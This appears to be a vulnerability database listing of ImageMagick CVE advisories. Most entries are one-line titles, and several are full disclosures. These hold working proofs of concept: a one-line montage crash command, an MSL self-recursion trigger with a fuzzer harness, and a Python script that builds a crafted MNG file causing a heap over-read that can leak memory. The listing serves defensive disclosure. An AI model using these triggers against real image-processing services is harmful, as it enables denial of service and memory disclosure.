VCID-uwj5-1fkf-7qg9 ImageMagick affected by divide-by-zero in ThumbnailImage via montage -geometry ":" leads to crash ## Summary Passing a geometry string containing only a colon (":") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service. ## Details **Root Cause** 1. `montage -geometry ":" ...` reaches `MagickCore/geometry.c:GetGeometry().` 2. `StringToDouble/InterpretLocaleValue` parses `":"` as `0.0;` then: https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355 `WidthValue` (and/or `HeightValue)` is set with a zero dimension. 3. In MagickCore/resize.c:ThumbnailImage(), the code computes: https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629 causing a division by zero and immediate crash. The issue is trivially triggerable without external input files (e.g., using `xc:white`). ### Reproduction Environment ``` Version: ImageMagick 7.1.2-1 (Beta) Q16-HDRI x86_64 0ba1b587b:20250812 https://imagemagick.org Features: Cipher DPC HDRI Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lcms lzma pangocairo png tiff x xml zlib Compiler: clang (14.0.0) OS/Arch: Linux x86_64 ``` Steps ``` ./bin/magick montage -geometry : xc:white null: ``` Observed result ``` IOT instruction (core dumped) # (Environment-dependent: SIGFPE/abort may be observed.) ``` ## PoC No external file required; the pseudo image xc:white suffices: ``` ./bin/magick montage -geometry : xc:white null: ``` ## Impact - **Denial of Service:** A divide-by-zero in `ThumbnailImage()` causes immediate abnormal termination (e.g., SIGFPE/abort), crashing the ImageMagick process. ## Suggested fix Defensively reject zero dimensions early in `ThumbnailImage()`: ```c if ((columns == 0) || (rows == 0)) { (void) ThrowMagickException(exception, GetMagickModule(), OptionError, "InvalidGeometry", "thumbnail requires non-zero dimensions: %.20gx%.20g", (double) columns, (double) rows); return (Image *) NULL; } ``` Additionally, consider tightening validation in `GetGeometry()` so that colon-only (and similar malformed) inputs do not yield `WidthValue/HeightValue` with zero, or are rejected outright. Variants like `"x:"` or `":x"` may also need explicit handling (maintainer confirmation requested). ## Credits ### Team Daemon Fuzz Hunters **Bug Hunting Master Program, HSpace/Findthegap** <br> **Woojin Park** @jin-156 [1203kids@gmail.com](mailto:1203kids@gmail.com) **Hojun Lee** @leehohojune [leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr) **Youngin Won** @amethyst0225 [youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr) **Siyeon Han** @hanbunny [kokosyeon@gmail.com](mailto:kokosyeon@gmail.com) CVE-2025-55212
GHSA-fh55-q5pj-pxgw
VCID-uwq6-h2du-dkdn ImageMagick: outside the range of representable values of type 'long' and signed integer overflow at MagickCore/quantize.c CVE-2020-27754
VCID-v1f2-upex-43fm ImageMagick: Memory leak in the ReadPCDImage function CVE-2017-8351
VCID-v24g-h7t5-nbec Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12693
VCID-v2r8-1wgn-1bgs Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2023-5341
VCID-v6h3-xnz8-xud4 ImageMagick: memory leak in quantum management CVE-2014-9848
VCID-v7m7-26bu-wfer security update CVE-2017-11533
VCID-v8ma-knpq-wkdv Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2017-5510
VCID-vaks-d4k5-zue7 ImageMagick MSL: Stack overflow via infinite recursion in ProcessMSLScript ## Summary Stack overflow via infinite recursion in MSL (Magick Scripting Language) `<write>` command when writing to MSL format. ## Version - ImageMagick 7.x (tested on current main branch) - Commit: HEAD - Requires: libxml2 support (for MSL parsing) ## Steps to Reproduce ### Method 1: Using ImageMagick directly ```bash magick MSL:recursive.msl out.png ``` ### Method 2: Using OSS-Fuzz reproduce ```bash python3 infra/helper.py build_fuzzers imagemagick python3 infra/helper.py reproduce imagemagick msl_fuzzer recursive.msl ``` Or run the fuzzer directly: ```bash ./msl_fuzzer recursive.msl ``` ## Expected Behavior ImageMagick should handle recursive MSL references gracefully by detecting the loop and returning an error. ## Actual Behavior Stack overflow causes process crash: ``` AddressSanitizer:DEADLYSIGNAL ==PID==ERROR: AddressSanitizer: stack-overflow #0 MSLStartElement /src/imagemagick/coders/msl.c:7045 #1 xmlParseStartTag /src/libxml2/parser.c #2 xmlParseChunk /src/libxml2/parser.c:11273 #3 ProcessMSLScript /src/imagemagick/coders/msl.c:7405 #4 WriteMSLImage /src/imagemagick/coders/msl.c:7867 #5 WriteImage /src/imagemagick/MagickCore/constitute.c:1346 #6 MSLStartElement /src/imagemagick/coders/msl.c:7045 ... (infinite recursion, 287+ frames) ``` ## Root Cause Analysis In `coders/msl.c`, the `<write>` command handler in `MSLStartElement()` (line ~7045) calls `WriteImage()`. When the output filename specifies MSL format (`msl:filename`), `WriteMSLImage()` is called, which parses the MSL file again via `ProcessMSLScript()`. If the MSL file references itself (directly or indirectly), this creates an infinite recursion loop: ``` MSLStartElement() → WriteImage() → WriteMSLImage() → ProcessMSLScript() → xmlParseChunk() → MSLStartElement() → ... (infinite loop) ``` ## Impact - **DoS**: Guaranteed crash via stack exhaustion - **Affected**: Any application using ImageMagick to process user-supplied MSL files ## Additional Trigger Paths The `<read>` command can also trigger recursion: Indirect recursion is also possible (a.msl → b.msl → a.msl). ## Fuzzer This issue was discovered using a custom MSL fuzzer: ```cpp #include <cstdint> #include <Magick++/Blob.h> #include <Magick++/Image.h> #include "utils.cc" extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if (IsInvalidSize(Size)) return(0); try { const Magick::Blob blob(Data, Size); Magick::Image image; image.magick("MSL"); image.fileName("MSL:"); image.read(blob); } catch (Magick::Exception) { } return(0); } ``` This issue was found by Team FuzzingBrain @ Texas A&M University CVE-2026-23874
GHSA-9vj4-wc7r-p844
VCID-vbdt-31wd-v3h8 imagemagick: heap-buffer overflow read in MNG magnification with alpha ## **Vulnerability Details** When performing image magnification in `ReadOneMNGIMage` (in `coders/png.c`), there is an issue around the handling of images with separate alpha channels. When loading an image with a color type that implies a separate alpha channel (ie. `jng_color_type >= 12`), we will load the alpha pixels in this loop: ```c if (logging != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " Reading alpha from alpha_blob."); jng_image=ReadImage(alpha_image_info,exception); if (jng_image != (Image *) NULL) for (y=0; y < (ssize_t) image->rows; y++) { s=GetVirtualPixels(jng_image,0,y,image->columns,1,exception); q=GetAuthenticPixels(image,0,y,image->columns,1,exception); // [0] if ((s == (const Quantum *) NULL) || (q == (Quantum *) NULL)) break; if (image->alpha_trait != UndefinedPixelTrait) for (x=(ssize_t) image->columns; x != 0; x--) { SetPixelAlpha(image,GetPixelRed(jng_image,s),q); q+=(ptrdiff_t) GetPixelChannels(image); s+=(ptrdiff_t) GetPixelChannels(jng_image); } else for (x=(ssize_t) image->columns; x != 0; x--) { Quantum alpha; alpha=GetPixelRed(jng_image,s); SetPixelAlpha(image,alpha,q); if (alpha != OpaqueAlpha) image->alpha_trait=BlendPixelTrait; // [1] q+=(ptrdiff_t) GetPixelChannels(image); s+=(ptrdiff_t) GetPixelChannels(jng_image); } if (SyncAuthenticPixels(image,exception) == MagickFalse) break; } ``` Note that at \[1\] we update `image->alpha_trait`, but if our alpha image only contains non-opaque pixels in the last row, we do not call `GetAuthenticPixels` (at \[0\]) after this change has been made. The next call to `GetAuthenticPixels` will then call down into `ResetPixelChannelMap` which adds the new alpha channel to the image channel mappings and metadata. If we then pass this image into the `MAGN` chunk type, we can see that at \[2\] we calculate the sizes for intermediate buffers `next` and `prev`, before calling `GetAuthenticPixels` at \[4\]. After the call at \[4\], the `image->num_channels` has increased to include the new alpha channel, and now `length` and the previously allocated `next` and `prev` buffers are too small. Fortunately `length` is always used when copying into the buffers, but when reading pixels from the buffers, we call `GetPixelXXX` which assumes the layout of the current image, which requires a larger allocation. The pixel copying loop will subsequently read beyond the end of the allocation at \[5\]. ```c /* magnify the rows into the right side of the large image */ if (logging != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " Magnify the rows to %.20g", (double) large_image->rows); m=(ssize_t) mng_info->magn_mt; yy=0; length=(size_t) GetPixelChannels(image)*image->columns; // [2] next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next)); prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev)); if ((prev == (Quantum *) NULL) || (next == (Quantum *) NULL)) { if (prev != (Quantum *) NULL) prev=(Quantum *) RelinquishMagickMemory(prev); if (next != (Quantum *) NULL) next=(Quantum *) RelinquishMagickMemory(next); image=DestroyImageList(image); ThrowReaderException(ResourceLimitError, "MemoryAllocationFailed"); } n=GetAuthenticPixels(image,0,0,image->columns,1,exception); // [4] (void) memcpy(next,n,length); for (y=0; y < (ssize_t) image->rows; y++) { if (y == 0) m=(ssize_t) mng_info->magn_mt; else if (magn_methy > 1 && y == (ssize_t) image->rows-2) m=(ssize_t) mng_info->magn_mb; else if (magn_methy <= 1 && y == (ssize_t) image->rows-1) m=(ssize_t) mng_info->magn_mb; else if (magn_methy > 1 && y == (ssize_t) image->rows-1) m=1; else m=(ssize_t) mng_info->magn_my; n=prev; prev=next; next=n; if (y < (ssize_t) image->rows-1) { n=GetAuthenticPixels(image,0,y+1,image->columns,1, exception); (void) memcpy(next,n,length); } for (i=0; i < m; i++, yy++) { Quantum *pixels; assert(yy < (ssize_t) large_image->rows); pixels=prev; n=next; q=GetAuthenticPixels(large_image,0,yy,large_image->columns, 1,exception); if (q == (Quantum *) NULL) break; q+=(ptrdiff_t) (large_image->columns-image->columns)* GetPixelChannels(large_image); for (x=(ssize_t) image->columns-1; x >= 0; x--) { /* To do: get color as function of indexes[x] */ /* if (image->storage_class == PseudoClass) { } */ if (magn_methy <= 1) { /* replicate previous */ SetPixelRed(large_image,GetPixelRed(image,pixels),q); // [5] SetPixelGreen(large_image,GetPixelGreen(image, pixels),q); SetPixelBlue(large_image,GetPixelBlue(image, pixels),q); SetPixelAlpha(large_image,GetPixelAlpha(image, pixels),q); } ``` This can likely be used to leak subsequent memory contents into the output image. The attached proof-of-concept triggers this issue and is not blocked by any of the default security policies. ## **Affected Version(s)** The issue has been successfully reproduced: - at commit `3e37a7f15fcb1aa80e6beae3898e684309c2ecbe` - in stable release `7.1.2-0` ### **Build Instructions** ```shell git clone https://github.com/imagemagick/imagemagick cd imagemagick export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -O0 -ggdb" export CXXFLAGS="-fsanitize=address -O0 -ggdb" export LDFLAGS="-fsanitize=address -O0 -ggdb" ./configure --disable-shared --disable-docs --with-jxl make -j ``` ## **Reproduction** ### **Test Case** This testcase is a python script that will generate an MNG file which can be used to trigger the vulnerability. ``` import struct import zlib def chunk(tag, data): crc = zlib.crc32(tag + data) & 0xffffffff return struct.pack('>I', len(data)) + tag + data + struct.pack('>I', crc) # Simple 128x1 RGB jpeg jpeg = bytes([ 0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01, 0x01, 0x01, 0x01, 0x2c, 0x01, 0x2c, 0x00, 0x00, 0xff, 0xdb, 0x00, 0x43, 0x00, 0x03, 0x02, 0x02, 0x03, 0x02, 0x02, 0x03, 0x03, 0x03, 0x03, 0x04, 0x03, 0x03, 0x04, 0x05, 0x08, 0x05, 0x05, 0x04, 0x04, 0x05, 0x0a, 0x07, 0x07, 0x06, 0x08, 0x0c, 0x0a, 0x0c, 0x0c, 0x0b, 0x0a, 0x0b, 0x0b, 0x0d, 0x0e, 0x12, 0x10, 0x0d, 0x0e, 0x11, 0x0e, 0x0b, 0x0b, 0x10, 0x16, 0x10, 0x11, 0x13, 0x14, 0x15, 0x15, 0x15, 0x0c, 0x0f, 0x17, 0x18, 0x16, 0x14, 0x18, 0x12, 0x14, 0x15, 0x14, 0xff, 0xdb, 0x00, 0x43, 0x01, 0x03, 0x04, 0x04, 0x05, 0x04, 0x05, 0x09, 0x05, 0x05, 0x09, 0x14, 0x0d, 0x0b, 0x0d, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0xff, 0xc0, 0x00, 0x11, 0x08, 0x00, 0x01, 0x00, 0x80, 0x03, 0x01, 0x11, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, 0xff, 0xc4, 0x00, 0x15, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0xff, 0xc4, 0x00, 0x14, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xda, 0x00, 0x0c, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3f, 0x00, 0xaa, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0xd9 ]) # MNG File Construction mng_sig = b'\x8aMNG\r\n\x1a\n' mhdr_data = struct.pack('>IIIIIII', 1, 1, 1, 0, 0, 0, 0) mhdr_chunk = chunk(b'MHDR', mhdr_data) magn_data = struct.pack('>HH B H H H H H H B', 0, 0, 1, 2, 2, 2, 2, 2, 2, 1) magn_chunk = chunk(b'MAGN', magn_data) jhdr_data = struct.pack('>IIBBBBBBBB', 128, 1, 12, 8, 8, 0, 8, 0, 0, 0) jhdr_chunk = chunk(b'JHDR', jhdr_data) jdat_chunk = chunk(b'JDAT', jpeg) scanlines = b'\x00\x00'*128 compressed_scanlines = zlib.compress(scanlines) idat_chunk = chunk(b'IDAT', compressed_scanlines) iend_chunk = chunk(b'IEND', b'') mend_chunk = chunk(b'MEND', b'') mng_bytes = mng_sig + mhdr_chunk + magn_chunk + jhdr_chunk + jdat_chunk + idat_chunk + iend_chunk + mend_chunk with open("magn_read.mng", "wb") as tmp: tmp.write(mng_bytes) ``` ### **Command** ```shell python3 ./generate_testcase.py utilities/magick ./magn_read.mng -resize 200x200 PNG:output.png ``` ### **ASan Backtrace** ``` ================================================================= ==1562409==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51b000000680 at pc 0x557a486b0c64 bp 0x7ffe63210de0 sp 0x7ffe63210dd8 READ of size 4 at 0x51b000000680 thread T0 #0 0x557a486b0c63 in GetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 #1 0x557a4869ce03 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:51 #2 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9 #3 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15 #4 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9 #5 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22 #6 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7 #7 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13 #8 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5 #9 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14 #10 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10 #11 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10 #12 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7f1431833d64 in __libc_start_main csu/../csu/libc-start.c:360:3 #14 0x557a481a0790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f3790) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3) 0x51b000000680 is located 0 bytes after 1536-byte region [0x51b000000080,0x51b000000680) allocated by thread T0 here: #0 0x557a482405c3 in malloc (/tmp/repro/imagemagick/utilities/magick+0x2935c3) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3) #1 0x557a482b9b6a in AcquireMagickMemory /tmp/repro/imagemagick/MagickCore/memory.c:559:10 #2 0x557a482b9dba in AcquireQuantumMemory /tmp/repro/imagemagick/MagickCore/memory.c:677:10 #3 0x557a4869c58c in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6584:34 #4 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9 #5 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15 #6 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9 #7 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22 #8 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7 #9 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13 #10 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5 #11 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14 #12 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10 #13 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10 #14 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 in GetPixelRed Shadow bytes around the buggy address: 0x51b000000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x51b000000680:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x51b000000700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x51b000000780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1562409==ABORTING ``` ## **Reporter Credit** Google Big Sleep CVE-2025-55004
GHSA-cjc8-g9w8-chfw
VCID-vbgc-23c4-77hu ImageMagick: memory leak in parse8BIM in coders/meta.c CVE-2018-14437
VCID-vbqu-m52z-4qfg security update CVE-2016-10063
VCID-vc8u-8je2-kfgt Multiple vulnerabilities have been discovered in ImageMagick, the worst of which could lead to arbitrary code execution. CVE-2012-1186
VCID-vd3a-e897-8bfn ImageMagick: memory leak in GetImagePixelCache function in MagickCore/cache.c CVE-2018-11655
VCID-vdum-127b-qfbq security update CVE-2019-9956
VCID-vf3u-cgrx-a7d7 ImageMagick: outside the range of representable values of type 'float' at MagickCore/quantize.c CVE-2020-27769
VCID-vguv-n176-k3ch ImageMagick: Memory leak in read_user_chunk_callback function CVE-2017-11310
VCID-vgvf-at1z-8ydr ImageMagick: out-of-bounds read in ReadXWDImage in coders/xwd.c CVE-2019-15139
VCID-vkp6-wh22-eqap ImageMagick CLAHE : Unsigned underflow and division-by-zero lead to OOB pointer arithmetic and process crash (DoS) A single root cause in the CLAHE implementation — tile width/height becoming zero — produces two distinct but related unsafe behaviors. Vulnerabilities exists in the `CLAHEImage()` function of ImageMagick’s `MagickCore/enhance.c`. 1. Unsigned integer underflow → out-of-bounds pointer arithmetic (OOB): when `tile_info.height == 0`, the expression `tile_info.height - 1` (unsigned) wraps to a very large value; using that value in pointer arithmetic yields a huge offset and OOB memory access (leading to memory corruption, SIGSEGV, or resource exhaustion). 2. **Division/modulus by zero**: where code performs `... / tile_info.width` or `... % tile_info.height` without re-checking for zero, causing immediate division-by-zero crashes under sanitizers or `abort` at runtime. Both behaviors are triggered by the same invalid tile condition (e.g., CLI exact `-clahe 0x0!` or automatic tile derivation `dim >> 3 == 0` for very small images). --- CVE-2025-62594
GHSA-wpp4-vqfq-v4hp
VCID-vp4y-qhc4-nuat ImageMagick: Memory leak in the function ReadMVGImage CVE-2017-12566
VCID-vpdn-g1k9-1kdn ImageMagick has heap buffer overflow in YUV 4:2:2 decoder A heap buffer overflow write vulnerability exists in ReadYUVImage() (coders/yuv.c) when processing malicious YUV 4:2:2 (NoInterlace) images. The pixel-pair loop writes one pixel beyond the allocated row buffer. ``` ================================================================= ==204642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5170000002e0 at pc 0x562d21a7e8de bp 0x7fffa9ae1270 sp 0x7fffa9ae1260 WRITE of size 8 at 0x5170000002e0 thread T0 ``` CVE-2026-25986
GHSA-mqfc-82jx-3mr2
VCID-vrqg-4fke-mfay Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-32547
VCID-vv56-v3c7-kfa1 Multiple buffer overflows have been discovered in ImageMagick, which could potentially result in the execution of arbitrary code. CVE-2006-3744
VCID-vyfj-c9vq-wkc9 ImageMagick: crash when parsing resource block CVE-2014-9851
VCID-vzhq-5h21-xuhk ImageMagick: heap overflow in corrupted psd file CVE-2014-9825
VCID-vzru-smr4-5kfk Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13758
VCID-w1s1-4kv8-5bca security update CVE-2016-7522
VCID-w1t7-1b22-jqe6 ImageMagick: Infinite loop due to a floating-point rounding error in some of the color algorithms CVE-2017-7619
VCID-w278-q56x-j7fw Multiple integer overflows have been discovered in ImageMagick allowing for the execution of arbitrary code. CVE-2007-1797
VCID-w289-j445-xka7 security update CVE-2016-5841
VCID-w44j-ecnr-mkhv ImageMagick: Memory leak in ReadMPCImage function in coders/mpc.c CVE-2017-12642
VCID-w5bd-tn21-fqh7 ImageMagick: Memory leak in WritePICONImage function CVE-2017-11751
VCID-w5fb-28z5-rkfq ImageMagick: crash on corrupted wpg file CVE-2014-9815
VCID-w8d2-r2ct-m7gv ImageMagick: Memory leak in the function WritePCXImage CVE-2017-12668
VCID-w8gb-1r6a-xud3 ImageMagick: heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel CVE-2019-13299
VCID-w9dc-fbc3-mudv ImageMagick: Assertion failure in SetPixelChannelAttributes CVE-2017-9499
VCID-wbx1-wdxc-k3bc Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13060
VCID-wd77-5tpf-6yhy ImageMagick: memory leak in rle file handling CVE-2014-9853
VCID-wjeh-7bpm-zyga ImageMagick: NULL pointer dereference in ps file handling CVE-2014-9812
VCID-wk4h-a1su-wfbh Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-3716
VCID-wpsv-h9q7-pyep ImageMagick: heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c leading to DoS or information disclosure CVE-2019-11597
VCID-wwam-wq1v-1fec ImageMagick: Memory leak in the WriteOnePNGImage() function CVE-2017-11538
VCID-wwcs-2mw8-4bbr ImageMagick: heap-based buffer over-read in BlobToStringInfo in MagickCore/string.c during TIFF image decoding CVE-2020-13902
VCID-wwxb-6psb-xybx ImageMagick: heap-based buffer over-read in the EncodeImage function of coders/pict.c CVE-2018-18025
VCID-wykb-4z7x-q7ga ImageMagick: handling of corrupted sun file CVE-2014-9830
VCID-wz1j-6ne4-m3a5 ImageMagick: Out-of heap-based buffer read by processing crafted JPEG EXIF header tag value CVE-2012-0259
VCID-x19m-3m6f-4khb security update CVE-2014-9907
VCID-x3wb-64kk-gues ImageMagick: Memory leak in ReadSGIImage CVE-2017-15217
VCID-x65n-6vuk-4ufk ImageMagick: Memory exhaustion in the ReadWPGImage function CVE-2017-14342
VCID-x6ab-eb8b-t3e7 ImageMagick: crash in xwd file handler CVE-2014-9811
VCID-x6ad-gnf9-ebes ImageMagick: throwing of exceptions in psd handling CVE-2014-9841
VCID-x6sg-6k7v-9qd8 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14174
VCID-x7g7-5k9x-gbay ImageMagick: incorrect thread limit logic CVE-2014-9850
VCID-x7us-26aq-3yf8 ImageMagick: memory exhaustion in function ReadTIFFImage causing denial of service CVE-2017-12805
VCID-x8c1-btup-4ygu ImageMagick is vulnerable to an integer Overflow in TIM decoder leading to out of bounds read (32-bit only) The TIM (PSX TIM) image parser in ImageMagick contains a critical integer overflow vulnerability in the `ReadTIMImage` function (`coders/tim.c`). The code reads `width` and `height` (16-bit values) from the file header and calculates `image_size = 2 * width * height` without checking for overflow. On 32-bit systems (or where `size_t` is 32-bit), this calculation can overflow if `width` and `height` are large (e.g., 65535), wrapping around to a small value. This results in a small heap allocation via `AcquireQuantumMemory` and later operations relying on the dimensions can trigger an out of bounds read. CVE-2025-66628
GHSA-6hjr-v6g4-3fm8
VCID-x8c6-9pse-xkc8 ImageMagick: Integer overflow in DIB coder can result in out of bounds read or write An integer overflow in DIB coder can result in out of bounds read or write CVE-2026-28693
GHSA-hffp-q43q-qq76
VCID-x8j9-exk2-mkez ImageMagick: heap overflow in xpm files CVE-2014-9820
VCID-x95w-ad3j-n7aj ImageMagick: Memory leak in the ReadSIXELImage function in coders/sixel.c CVE-2019-7396
VCID-x998-fhs5-93ht ImageMagick: heap-based buffer over-read in MagickCore/fourier.c CVE-2019-13391
VCID-x9m3-pune-akdj Vulnerabilities found in ImageMagick might allow remote attackers to execute arbitrary code. CVE-2012-0247
VCID-x9y3-z82n-33d8 ImageMagick: use-after-free in TraceBezier function in MagickCore/draw.c CVE-2019-17547
VCID-xaef-x656-fqfq ImageMagick: memory leak in the function ReadPGXImage in coders/pgx.c CVE-2017-17883
VCID-xbsu-ac6g-53fn ImageMagick has heap-buffer-overflow via signed integer overflow in WriteUHDRImage when writing UHDR images with large dimensions `WriteUHDRImage` in `coders/uhdr.c` uses `int` arithmetic to compute the pixel buffer size. When image dimensions are large, the multiplication overflows 32-bit `int`, causing an undersized heap allocation followed by an out-of-bounds write. This can crash the process or potentially lead to an out of bounds heap write. ``` ==1575126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc382ef3820 at pc 0x5560d31f229f bp 0x7ffe865f9530 sp 0x7ffe865f9520 WRITE of size 8 at 0x7fc382ef3820 thread T0 #0 0x5560d31f229e in WriteUHDRImage coders/uhdr.c:807 ``` CVE-2026-25794
GHSA-vhqj-f5cj-9x8h
VCID-xd3u-trsv-fbd3 security update CVE-2016-7520
VCID-xfd9-xwru-aubv ImageMagick: crash on corrupted xwd image CVE-2014-9809
VCID-xgu5-jypk-h3bd ImageMagick: NULL pointer dereference in the sixel_decode function CVE-2017-14626
VCID-xgzr-fhu9-myed security update CVE-2017-11527
VCID-xk7c-7f1m-sqe5 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12983
VCID-xnkt-e7mn-e7du ImageMagick: memory leaks at AcquireMagickMemory because of a wand/mogrify.c error CVE-2019-13311
VCID-xp3x-q8w4-myhb security update CVE-2017-11360
VCID-xp7w-rc4w-jqcj ImageMagick: heap overflow in psd file CVE-2014-9833
VCID-xsue-s6sg-aqff ImageMagick: heap-based buffer overflow in WriteOnePNGImage in coders/png.c CVE-2020-25674
VCID-xtfv-8vvu-qudb ImageMagick: Division by zero in ReadEnhMetaFile lead to DoS CVE-2021-40211
VCID-xtq9-fvcv-kfat security update CVE-2017-11450
VCID-xy5b-m3h2-hbfj security update CVE-2017-9440
VCID-xzye-g5rw-fyh5 Multiple vulnerabilities have been found in GraphicsMagick, allowing remote attackers to execute arbitrary code or cause a Denial of Service condition. CVE-2009-3736
VCID-y2nm-f9vb-d7ez security update CVE-2017-12640
